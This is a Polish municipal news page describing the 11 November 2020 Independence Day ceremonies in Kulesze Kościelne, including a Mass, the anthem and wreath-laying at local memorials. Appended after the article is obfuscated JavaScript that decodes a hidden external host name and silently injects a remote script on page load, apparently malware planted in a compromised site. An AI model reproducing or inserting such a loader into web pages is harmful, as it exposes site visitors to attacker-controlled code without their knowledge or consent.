Aktualności

Narodowe Święto Niepodległości w Gminie Kulesze Kościelne.

lis 12, 2020 | Aktualności

W dniu 11 listopada 2020 roku, odbyły się uroczyste obchody Narodowego Święta Niepodległości. Uroczystości rozpoczęły się o godz. 10.00 Mszą Świętą w intencji Ojczyzny w Kościele Parafialnym pw. Św. Bartłomieja w Kuleszach Kościelnych  koncelebrowaną przez Proboszcza Parafii Ks. Krzysztofa Konopkę. W nabożeństwie udział wzięli władze i pracownicy Urzędu Gminy Kulesze Kościelne z Wójtem Gminy Stefanem Grodzkim na czele,  Przewodniczący Rady Gminy Kulesze Kościelne Grzegorz Kossakowski, Starosta Wysokomazowiecki Bogdan Zieliński oraz poczty sztandarowe Ochotniczej Straży Pożarnej, a także zgromadzeni mieszkańcy. Po Mszy Świętej nastąpiło odśpiewanie hymnu oraz złożenie kwiatów pod tablicą upamiętniającą ofiary okupacji niemieckiej pod budynkiem parafialnym. Następnie władze Gminy oraz Powiatu złożyły kwiaty przy pomniku Powstańców Styczniowych w miejscowości Czarnowo Biki.			
Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);